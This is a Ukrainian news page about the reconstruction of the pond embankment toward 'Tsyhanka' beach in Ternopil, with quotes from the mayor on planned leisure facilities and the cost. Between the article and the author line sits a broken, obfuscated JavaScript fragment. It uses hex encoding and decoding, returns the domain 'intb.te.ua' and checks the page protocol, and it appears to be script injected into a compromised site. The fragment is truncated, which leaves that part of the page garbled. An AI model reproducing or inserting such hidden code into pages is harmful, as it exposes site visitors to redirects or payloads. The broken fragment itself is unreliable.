Ви знаходитесь: Головна / Новини / Ремонт набережної ставу в напрямку «Циганки» в розпалі

Ремонт набережної ставу в напрямку «Циганки» в розпалі

Оновлення набережної в напрямку «Циганки» –  один з наймасштабніших об’єктів реконструкції за останні кілька років. Вже вкінці літа  тернополяни та гості міста зможуть оцінити відпочинкову зону, яка запевняють, буде кожному до смаку.

СЕРГІЙ НАДАЛ, міський голова Тернополя

«Нова набережна, «Циганка» робиться таким чином, щоб могли відпочивати, хто-як забажає. Окремо будуть місця для заняття спортом. Окремо будуть місця для зеленого пляжу. Окремо будуть місця, де можна проводити різні лекції, виступи. Окремо буде пішохідний фонтан, окремо будуть місця, велосипедні доріжки, для тих, хто бажає кататися на велосипеді. Все це буде поєднано в одному такому комплексі, я думаю, що це стане ще однією окрасою нашого міста і принадою для туристів і для тернополян».

Зараз укріплюють берег та бетонують пішохідні зони і оглядові майданчики. Ведуться підготовчі роботи для облаштування «зеленого пляжу». А невдовзі візьмуться за будівництво дороги, окремо облаштують велодоріжки, волейбольний та спортивний майданчики та пішохідний фонтан.

СЕРГІЙ НАДАЛ, міський голова Тернополя

«Паралельно ведуться роботи по укріпленню набережної ставу від острівка «Чайка» і в напрямку до пляжу «Циганка». Також тут поруч з пляжем «Циганка» передбачене облаштування великої зони паркування, згодом будуть передбачені ще й місця для заїзду громадського транспорту і розворотний майданчик, щоб люди мали можливість доїхати не лише приватним транспортом, але й громадським транспортом довести людей до початку цієї відпочинкової зони».

Попередня вартість всього об’єкту складає близько 10 мільйонів гривень. Однак, про більш точну суму можна буде говорити вже по завершенні робіт, пояснює міський голова.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “intb.te.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top